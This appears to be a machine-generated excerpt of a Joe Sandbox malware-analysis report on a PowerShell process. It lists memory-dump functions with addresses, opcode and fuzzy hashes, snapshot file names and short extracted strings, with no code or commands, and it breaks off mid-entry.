Opcode ID: bd74a27a38e6fdb70a4ff29e1ae3d72319a49d2cf4da2f82ef5e1ebee3095616
Instruction ID: eb74b4f5efaea1d59bf0f50dd1edf8071bbfa39af076f3cc96d0d2d9fc81d5e3
Opcode Fuzzy Hash: bd74a27a38e6fdb70a4ff29e1ae3d72319a49d2cf4da2f82ef5e1ebee3095616
Instruction Fuzzy Hash: 92313774A00605DFCB15CF58C5809AAFBB2FF89310B248299D559EB751C732EC81CFA0

Function 02A0A93B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffcdb7e19d8c4ef3ab582da827220fa45cfb301cfba0589485d809a76d68f172
Instruction ID: 7b5bc19cdc5074141c335a579797a1ef70f508ac4539b34478ba9fd0e2ed0165
Opcode Fuzzy Hash: ffcdb7e19d8c4ef3ab582da827220fa45cfb301cfba0589485d809a76d68f172
Instruction Fuzzy Hash: B2318274A093898FCB02DB58D89099EBFB0FF4A310B15419BD945EB392D734ED45CBA1

Function 0087F51B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2176997039.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_87d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10e0e81b4ecc79ba03b3e7b5f63dc99703f81ec8ebfe0e6a277d2727c0b2a184
Instruction ID: f9cc2932ef2e563e541d45a3cb11c2d1951b6b8f57b8c1c55cf842c91cf1348a
Opcode Fuzzy Hash: 10e0e81b4ecc79ba03b3e7b5f63dc99703f81ec8ebfe0e6a277d2727c0b2a184
Instruction Fuzzy Hash: F4218C76504240DFCF06CF14D9C4B16BF62FB58314F24C6A9E9098A66AC33AD86ACB91

Function 08F1079C Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2191438502.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3925527311440488e4b25d92f6a07581a9f7c1952bb0dc6d380c9acfd450f9c8
Instruction ID: 262a5f51c0e75fc84b2253e4dba61dfa7aa0843fb934c05598922eba227b7f7f
Opcode Fuzzy Hash: 3925527311440488e4b25d92f6a07581a9f7c1952bb0dc6d380c9acfd450f9c8
Instruction Fuzzy Hash: 7A014734D083854FCB12D738D84458EBFB4EF43220B4241ABD089CB5A2C728580AC7B2

Function 0087D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2176997039.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_87d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb63225710bf8e813dd7fbe438e2e28cde554f2b8edf68a25522ac3da0f6eb1
Instruction ID: c44d493fd1865cf0f522b68a63c7276d5c0351df0fe0100bf466f521f7d8ba38
Opcode Fuzzy Hash: 5bb63225710bf8e813dd7fbe438e2e28cde554f2b8edf68a25522ac3da0f6eb1
Instruction Fuzzy Hash: 5F01A771405B449AE7208A25DD84B67BFE8FF51324F18C419ED4D9A14AC279D845C6B1

Function 02A0F510 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9dce9fe7a822c2415744d7f8070afbaed69b7db9e903875d333b7145712bd54
Instruction ID: 0e9cbd8dc64c822fe474d96497334a1a8e506d5f7635b716be3e2c7d890f8f9d
Opcode Fuzzy Hash: f9dce9fe7a822c2415744d7f8070afbaed69b7db9e903875d333b7145712bd54
Instruction Fuzzy Hash: CCF0C8B57015195FC7566B38F41943D3BA7EFC9721318405EE806C77A6DF389C028796

Function 08F1074D Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2191438502.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 438723171e597701078fb4268cee3338ed44602f437d9a62ede74fb325224051
Instruction ID: 169c8882b60fff08cd7ed7ed553fddb48d2e2f3bb65823a2be2c46de7b3b6c05
Opcode Fuzzy Hash: 438723171e597701078fb4268cee3338ed44602f437d9a62ede74fb325224051
Instruction Fuzzy Hash: 40F0C230E092864FCB029768D8405DD7B71EF82251F5540A7D444DB297DA285C0A8B61

Function 02A0F520 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e14b7f608890c09709196901ede0d3a9b4ffd6de4b68dba2942461d6adb54459
Instruction ID: 56cb85174ef10a891b3545ed2c782b73dc9b723ab6b4455c9c9aa374da30f9fb
Opcode Fuzzy Hash: e14b7f608890c09709196901ede0d3a9b4ffd6de4b68dba2942461d6adb54459
Instruction Fuzzy Hash: 5FF06DB93005188F86896B38A45943E3BA7EFC97223184019E806CB759DF389C028791

Function 0087D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2176997039.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_87d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61ee9cbc4f7a404008a5ef42ef9d03349f4e1a1d2ce9834ff23f0550a22aa06
Instruction ID: f0ec2de8c022c4caa9c765b73e4c5eb4f0dce6d18d3c2bad65c7706f8bfe1bd0
Opcode Fuzzy Hash: d61ee9cbc4f7a404008a5ef42ef9d03349f4e1a1d2ce9834ff23f0550a22aa06
Instruction Fuzzy Hash: 7FF0C272405744AEE7208E16CCC4B62FFE8EF51334F18C45AED4C5E28AC2799C45CAB0

Function 02A02D35 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd1594133ebbef25a6c531b11ce6eeda7af51a691478a95d375045069eeeb070
Instruction ID: a4e71605881d1aaaff9f22832daeca322bb802dc9bf1a47ea3b279f4671cbcbf
Opcode Fuzzy Hash: bd1594133ebbef25a6c531b11ce6eeda7af51a691478a95d375045069eeeb070
Instruction Fuzzy Hash: DAF09035A043458FC706CB58D8A16A8F7B0FF4932871182E7C4189B1E2C7329C16CB50

Function 08F12EFA Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2191438502.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6abe9474e9075b8430d12a3754331a94e2e594dff6a7b872567adbac2791c1b
Instruction ID: dee7674f6f1ae8297a4d14d50412e8f6477459cc9d4ea80e28388a146db4dc47
Opcode Fuzzy Hash: b6abe9474e9075b8430d12a3754331a94e2e594dff6a7b872567adbac2791c1b
Instruction Fuzzy Hash: E7F0F931A00109AFCB15DFD8D9408ADFB77FF88320B648119E514A32A4C732AD22CB50

Function 02A0FDCC Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f653d6a6e7d90a3960ea17a1b004baf570c8b37be19166742c67cb902770d1
Instruction ID: f8ffdfe459cf40611dd33b6d6e27aeacb8a7ac829e798f162611ec786798c738
Opcode Fuzzy Hash: 33f653d6a6e7d90a3960ea17a1b004baf570c8b37be19166742c67cb902770d1
Instruction Fuzzy Hash: 51E01275D042489FC740DF789842569FFF0AB15210B1485EEC559DB211E6319A42CFD1

Function 02A0FDD8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2177596781.0000000002A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2a00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 0b0ab4253ee133f3994730a17407743108318671c55e0781c61d8371e32140a5
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: B4D067B0D042099F8790EFADD94156EFBF4EB59200F6085AE891DE7341EB329A12CFD1

Non-executed Functions

Function 071CFA45 Relevance: 19.0, Strings: 15, Instructions: 285COMMON

Download Yara Rule

Strings

(rq, xrefs: 071CFC32
84zl, xrefs: 071CFB28
(rq, xrefs: 071CFCD5
84zl, xrefs: 071CFB1E
tPlq, xrefs: 071CFB7D
$lq, xrefs: 071CFA9D
tPlq, xrefs: 071CFB71
tPlq, xrefs: 071CFC6C
84zl, xrefs: 071CFC1A
4'lq, xrefs: 071CFD44
4'lq, xrefs: 071CFD50
tPlq, xrefs: 071CFC78
(rq, xrefs: 071CFC96
(rq, xrefs: 071CFCA0
84zl, xrefs: 071CFC24

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'lq$4'lq$84zl$84zl$84zl$84zl$tPlq$tPlq$tPlq$tPlq$$lq$(rq$(rq$(rq$(rq
API String ID: 0-2802174530
Opcode ID: b4595013ca2b300d8b1b8f72c7d3e1f63067cf49ff3e1e41519b8e53c71f7ee5
Instruction ID: 784556705f0b781547010f9e3afd5201030f61e3d3de7c40e698163c6405b009
Opcode Fuzzy Hash: b4595013ca2b300d8b1b8f72c7d3e1f63067cf49ff3e1e41519b8e53c71f7ee5
Instruction Fuzzy Hash: 02A1E9B67501069FCB19CF98C9507BAB7A7AB99710F24845DE8019B2D8CB31DD43C7A1

Function 071CBEB2 Relevance: 16.7, Strings: 13, Instructions: 471COMMON

Download Yara Rule

Strings

4'lq, xrefs: 071CC38E
x.mk, xrefs: 071CC5C1
4'lq, xrefs: 071CC300
-mk, xrefs: 071CC60F
tLnk, xrefs: 071CBFCB
4'lq, xrefs: 071CC2EA
(f|l, xrefs: 071CC4DD
(f|l, xrefs: 071CC0E1
(f|l, xrefs: 071CC1B1
4'lq, xrefs: 071CC3A4
tLnk, xrefs: 071CC0C1
(f|l, xrefs: 071CC477
(f|l, xrefs: 071CBFEB

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (f|l$(f|l$(f|l$(f|l$(f|l$4'lq$4'lq$4'lq$4'lq$tLnk$tLnk$x.mk$-mk
API String ID: 0-2665676764
Opcode ID: cfc043bd55a4b8df511578593aaf72d7f64585070607ab17f76f4f6369ac3274
Instruction ID: 795a4b698061f62e92ee6cf7ec31d8cf25016095b849d401eab2adb7fb444013
Opcode Fuzzy Hash: cfc043bd55a4b8df511578593aaf72d7f64585070607ab17f76f4f6369ac3274
Instruction Fuzzy Hash: 6F226EF4A002159FDB24DF68C951BEEBBB2FB94304F108599D8096B385CB35AE85CF91

Function 071CF1CD Relevance: 14.0, Strings: 11, Instructions: 209COMMON

Download Yara Rule

Strings

84zl, xrefs: 071CF339
tPlq, xrefs: 071CF38D
d%rq, xrefs: 071CF3B5
d%rq, xrefs: 071CF3EA
$lq, xrefs: 071CF268
d%rq, xrefs: 071CF347
tPlq, xrefs: 071CF381
4'lq, xrefs: 071CF42B
4'lq, xrefs: 071CF41F
d%rq, xrefs: 071CF3AB
84zl, xrefs: 071CF32F

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'lq$4'lq$84zl$84zl$d%rq$d%rq$d%rq$d%rq$tPlq$tPlq$$lq
API String ID: 0-3083483887
Opcode ID: 905885a9089bf280145e20f9ab8b57534ef1440a2612d9f59c234242125de087
Instruction ID: 7a10ab5c834969dca421d08f5be904d0727b376747a839fd87198038774d69d3
Opcode Fuzzy Hash: 905885a9089bf280145e20f9ab8b57534ef1440a2612d9f59c234242125de087
Instruction Fuzzy Hash: 8271F6B67002069FDB19DEA9C510A7ABBA7EB98310F24855DD901DF2D4DB31DC42C7A1

Function 071C0918 Relevance: 12.8, Strings: 10, Instructions: 320COMMON

Download Yara Rule

Strings

rl, xrefs: 071C0BCF
$lq, xrefs: 071C0AFA
$lq, xrefs: 071C0B2C
4'lq, xrefs: 071C0A1B
$lq, xrefs: 071C0B20
tPlq, xrefs: 071C0B65
rl, xrefs: 071C0BDD
4'lq, xrefs: 071C0A27
#lk, xrefs: 071C09E7
tPlq, xrefs: 071C0B71

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'lq$4'lq$tPlq$tPlq$#lk$$lq$$lq$$lq$rl$rl
API String ID: 0-2257079706
Opcode ID: 96d1310cf9196649015fd6318f6e8650450e76be063866c5096c739532a5f901
Instruction ID: 902a60e1409f40452c34afa1af79432e2aac61fe9cda7a05684a70c15d1a67e1
Opcode Fuzzy Hash: 96d1310cf9196649015fd6318f6e8650450e76be063866c5096c739532a5f901
Instruction Fuzzy Hash: 68A147B2304356DFC726CAB98C1077ABBA6EFDA610B1980AFD445CB2D1DB31D941C7A1

Function 08F23278 Relevance: 11.7, Strings: 9, Instructions: 451COMMON

Download Yara Rule

Strings

$lq, xrefs: 08F237B6
84zl, xrefs: 08F233BF
84zl, xrefs: 08F232D3
tPlq, xrefs: 08F232B3
84zl, xrefs: 08F232DD
$lq, xrefs: 08F237C2
84zl, xrefs: 08F233CB
$lq, xrefs: 08F2379E
tPlq, xrefs: 08F232A9

Memory Dump Source

Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd

Similarity

API ID:
String ID: 84zl$84zl$84zl$84zl$tPlq$tPlq$$lq$$lq$$lq
API String ID: 0-117924011
Opcode ID: 38cc165972184255586059429a0ce8f66672793647815bc789468e7a4a4a49f5
Instruction ID: 5637868a4c962c8f42e00925b4a35cd716ba319000d0205c01d6564c11777c46
Opcode Fuzzy Hash: 38cc165972184255586059429a0ce8f66672793647815bc789468e7a4a4a49f5
Instruction Fuzzy Hash: 7FF108B5B04215EFCB149E79C8107AABBB2EF84311F24C46EE9059B3A4DB39DD41C7A1

Function 08F24252 Relevance: 10.3, Strings: 8, Instructions: 324COMMON

Download Yara Rule

Strings

tPlq, xrefs: 08F2438F
84zl, xrefs: 08F2445F
84zl, xrefs: 08F24332
tPlq, xrefs: 08F2439B
84zl, xrefs: 08F2433E
84zl, xrefs: 08F24453
tPlq, xrefs: 08F244BC
tPlq, xrefs: 08F244B0

Memory Dump Source

Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd

Similarity

API ID:
String ID: 84zl$84zl$84zl$84zl$tPlq$tPlq$tPlq$tPlq
API String ID: 0-4075537406
Opcode ID: 534fbc177be67c89861c6741b3ffe2eb26a9dca25f69cf2f53273e5c68a35ad0
Instruction ID: e7222b0e4dd2bb5975737c35ab71a540b57e5c0b1f5cbf29021be166075976e1
Opcode Fuzzy Hash: 534fbc177be67c89861c6741b3ffe2eb26a9dca25f69cf2f53273e5c68a35ad0
Instruction Fuzzy Hash: ABC10475B00229DFCB14CF69C440AAABBE2FF98311F248569E8159B394CB71EC51CBE5

Function 08F21D98 Relevance: 10.3, Strings: 8, Instructions: 259COMMON

Download Yara Rule

Strings

tPlq, xrefs: 08F21E67
84zl, xrefs: 08F21F27
84zl, xrefs: 08F21F1B
84zl, xrefs: 08F21E15
tPlq, xrefs: 08F21F78
84zl, xrefs: 08F21E1F
tPlq, xrefs: 08F21F84
tPlq, xrefs: 08F21E73

Memory Dump Source

Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd

Similarity

API ID:
String ID: 84zl$84zl$84zl$84zl$tPlq$tPlq$tPlq$tPlq
API String ID: 0-4075537406
Opcode ID: a73ffab12f2672339d28ee910892846685c0647164daceb731251631342e955b
Instruction ID: e86bed917395733038cceb3247cd15d9b0920fdee6138a35fc0b2cee7249c887
Opcode Fuzzy Hash: a73ffab12f2672339d28ee910892846685c0647164daceb731251631342e955b
Instruction Fuzzy Hash: 1D91D275B00125DFCB24DF68C950AAAFBE2FBC8311B24855EE8169B394DB31ED42C791

Function 071C1440 Relevance: 10.2, Strings: 8, Instructions: 195COMMON

Download Yara Rule

Strings

rl, xrefs: 071C1615
$lq, xrefs: 071C1454
$lq, xrefs: 071C15D2
rl, xrefs: 071C1623
tPlq, xrefs: 071C14E4
tPlq, xrefs: 071C14F0
$lq, xrefs: 071C15DE
$lq, xrefs: 071C15A7

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: tPlq$tPlq$$lq$$lq$$lq$$lq$rl$rl
API String ID: 0-2283738031
Opcode ID: 72762edf9c8b0594e69596d7c8ce9e7145a743cfd29e12f60428d74e0a57ddf3
Instruction ID: b5d3f9ded5547d0a9fdb263a39cdd585749088333b1e291ef344172f725c3b65
Opcode Fuzzy Hash: 72762edf9c8b0594e69596d7c8ce9e7145a743cfd29e12f60428d74e0a57ddf3
Instruction Fuzzy Hash: 59513AF1784349ABDB25CAA98800767BBB6AB92710F18C46FE506CB2D2DB71C841D791

Function 08F206DD Relevance: 10.2, Strings: 8, Instructions: 194COMMON

Download Yara Rule

Strings

XRqq, xrefs: 08F2084D
$lq, xrefs: 08F20735
XRqq, xrefs: 08F2085D
tPlq, xrefs: 08F207C8
tPlq, xrefs: 08F207BC
XRqq, xrefs: 08F20719
84zl, xrefs: 08F20767
84zl, xrefs: 08F20771

Memory Dump Source

Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd

Similarity

API ID:
String ID: 84zl$84zl$XRqq$XRqq$XRqq$tPlq$tPlq$$lq
API String ID: 0-431398978
Opcode ID: 4430715e8faaceef83c0f991e88bff4aaab00067ad8d0415765cd211986e14f0
Instruction ID: f814bb22a9d0ab0c3e3667f89d882e9617b32109c20524c2c29aa6c9437f09cf
Opcode Fuzzy Hash: 4430715e8faaceef83c0f991e88bff4aaab00067ad8d0415765cd211986e14f0
Instruction Fuzzy Hash: AD61E336B04525DFCB149E798540AAABBF2ABC9312F24C16DE4059B2A5CF31DC41CBA1

Function 071CB3A0 Relevance: 7.6, Strings: 6, Instructions: 129COMMON

Download Yara Rule

Strings

$lq, xrefs: 071CB3F7
$lq, xrefs: 071CB463
$lq, xrefs: 071CB457
$lq, xrefs: 071CB413
$lq, xrefs: 071CB447
$lq, xrefs: 071CB43B

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: $lq$$lq$$lq$$lq$$lq$$lq
API String ID: 0-1854859054
Opcode ID: d8749f28f202bec6b019cd209d8d95aa21393da1c4994e34bb4ff11db09cb205
Instruction ID: 26af554f810c3f39b314d7447fc6a99acf1cc5ab8a3dd78582cc7b500e92005f
Opcode Fuzzy Hash: d8749f28f202bec6b019cd209d8d95aa21393da1c4994e34bb4ff11db09cb205
Instruction Fuzzy Hash: 0041B6F170D3468FCB36CEA9984226BFBB2EB95610B15807FD446CB286DB31D845C792

Function 071CF2CE Relevance: 7.6, Strings: 6, Instructions: 85COMMON

Download Yara Rule

Strings

d%rq, xrefs: 071CF3B5
d%rq, xrefs: 071CF347
tPlq, xrefs: 071CF381
4'lq, xrefs: 071CF41F
d%rq, xrefs: 071CF3AB
84zl, xrefs: 071CF32F

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'lq$84zl$d%rq$d%rq$d%rq$tPlq
API String ID: 0-3386221057
Opcode ID: 6c744bbbd9d059b66c20a3bde7246ba9b49ff026728c9632e730e2a79cceeb56
Instruction ID: cace4ef74db6774b42aa45a49a8de3402db68c7ad889cb7c81854a685e52250e
Opcode Fuzzy Hash: 6c744bbbd9d059b66c20a3bde7246ba9b49ff026728c9632e730e2a79cceeb56
Instruction Fuzzy Hash: 0A31B3B5B00205AFC718CF94C550A6ABBB7EB98714F25C159E805AF384C731DC42CB91

Function 08F2006D Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

tPlq, xrefs: 08F20156
$lq, xrefs: 08F200C5
84zl, xrefs: 08F200F7
tPlq, xrefs: 08F2014A
84zl, xrefs: 08F20101

Memory Dump Source

Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd

Similarity

API ID:
String ID: 84zl$84zl$tPlq$tPlq$$lq
API String ID: 0-1606296645
Opcode ID: 17eeb1c900c009c6298e6e6448930d7c9e456cfeebfe9479bb3a70874e1dfcff
Instruction ID: 011eb29aeac3a33cc104b1ffc4a60f4cdd4aac966056f50afdb552bd26454072
Opcode Fuzzy Hash: 17eeb1c900c009c6298e6e6448930d7c9e456cfeebfe9479bb3a70874e1dfcff
Instruction Fuzzy Hash: 8A61B336B04615DFDB14DFB88940A6AFBA2ABC5312F24C06AE4159B395CF31DD42CBA1

Function 071CE7E0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

4'lq, xrefs: 071CE8FF
$lq, xrefs: 071CE8E1
4'lq, xrefs: 071CE90B
$lq, xrefs: 071CE8D1
$lq, xrefs: 071CE886

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'lq$4'lq$$lq$$lq$$lq
API String ID: 0-2560084307
Opcode ID: 1de50dac900975111010d46c60c88b71f6cdbb319b3db08f777d98bf9d8671ba
Instruction ID: 8aef690a5836fb7e59049cb363c68d72962d096401a46ae80d63844cec4d6910
Opcode Fuzzy Hash: 1de50dac900975111010d46c60c88b71f6cdbb319b3db08f777d98bf9d8671ba
Instruction Fuzzy Hash: 8C51F6B1B0424ADFCF69CFA9C5052AAB7A2FF91310F14C06EE8058B2D4DB31D949CB91

Function 071C0538 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

$lq, xrefs: 071C0609
$lq, xrefs: 071C05C4
$lq, xrefs: 071C05FD
4'lq, xrefs: 071C0632
4'lq, xrefs: 071C0626

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'lq$4'lq$$lq$$lq$$lq
API String ID: 0-2560084307
Opcode ID: 96a090adf158a9706d95570f754524cb5ad42dadfb7b711c470534d1ce43151e
Instruction ID: c67759ff599aff0e74519a58760f1653b2172c79cf3e5b9ea3c6dcc9ff6e5d95
Opcode Fuzzy Hash: 96a090adf158a9706d95570f754524cb5ad42dadfb7b711c470534d1ce43151e
Instruction Fuzzy Hash: EE4114B1714316DFCB169EB4CC106BA7BB2AFD6200F14806EE905CB2D1DB31C956C7A2

Function 071C5778 Relevance: 6.4, Strings: 5, Instructions: 130COMMON

Download Yara Rule

Strings

$lq, xrefs: 071C5814
4'lq, xrefs: 071C5872
$lq, xrefs: 071C5808
$lq, xrefs: 071C57AF
4'lq, xrefs: 071C5866

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'lq$4'lq$$lq$$lq$$lq
API String ID: 0-2560084307
Opcode ID: a333b262a4598d152af90ad1cf7769069836b8c0e1874920af74bed735836676
Instruction ID: d2464682e734269b3f3fd1e5a1190e24b694bbf35a58adde4463b5326acb800a
Opcode Fuzzy Hash: a333b262a4598d152af90ad1cf7769069836b8c0e1874920af74bed735836676
Instruction Fuzzy Hash: BC412DB170030BDFDB2ACEAA854217AB7A3EFA1210B74816FD8118B1D5DB35E561C762

Function 071CF525 Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

$lq, xrefs: 071CF57B
$lq, xrefs: 071CF5B5
4'lq, xrefs: 071CF5ED
4'lq, xrefs: 071CF5E1
$lq, xrefs: 071CF5C1

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'lq$4'lq$$lq$$lq$$lq
API String ID: 0-2560084307
Opcode ID: f895d58b681248f9f989876f53f67292e2979dabe60a50ce2b0a9a4d1d5a8bc2
Instruction ID: ebd151415047e208cdbc7417882c9f4ddae25e7d25f5f3189bdd134a961041d7
Opcode Fuzzy Hash: f895d58b681248f9f989876f53f67292e2979dabe60a50ce2b0a9a4d1d5a8bc2
Instruction Fuzzy Hash: B93125B37042578FCB26CEE88440276B7BBAFA5210B2580AED702C62D5DB35C657C761

Function 08F21670 Relevance: 6.3, Strings: 5, Instructions: 81COMMON

Download Yara Rule

Strings

$lq, xrefs: 08F216C8
$lq, xrefs: 08F21690
tPlq, xrefs: 08F2172C
$lq, xrefs: 08F216AC
$lq, xrefs: 08F216E7

Memory Dump Source

Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd

Similarity

API ID:
String ID: tPlq$$lq$$lq$$lq$$lq
API String ID: 0-2410456559
Opcode ID: 406eb329de9857f0f978172908e52032e69d52bcb51c25b343956ec3650e74aa
Instruction ID: f512826ce237f8697af47c1a3efbf7cb7f1a5f981637585e987096851ff84223
Opcode Fuzzy Hash: 406eb329de9857f0f978172908e52032e69d52bcb51c25b343956ec3650e74aa
Instruction Fuzzy Hash: A7210876A00228DFCB318E74C54097ABBB5EF80752B1D816EEC009B351D771F980CBA5

Function 071C0309 Relevance: 6.3, Strings: 5, Instructions: 66COMMON

Download Yara Rule

Strings

4'lq, xrefs: 071C0373
4'lq, xrefs: 071C02EB
$lq, xrefs: 071C035E
4'lq, xrefs: 071C037F
$lq, xrefs: 071C0352

Memory Dump Source

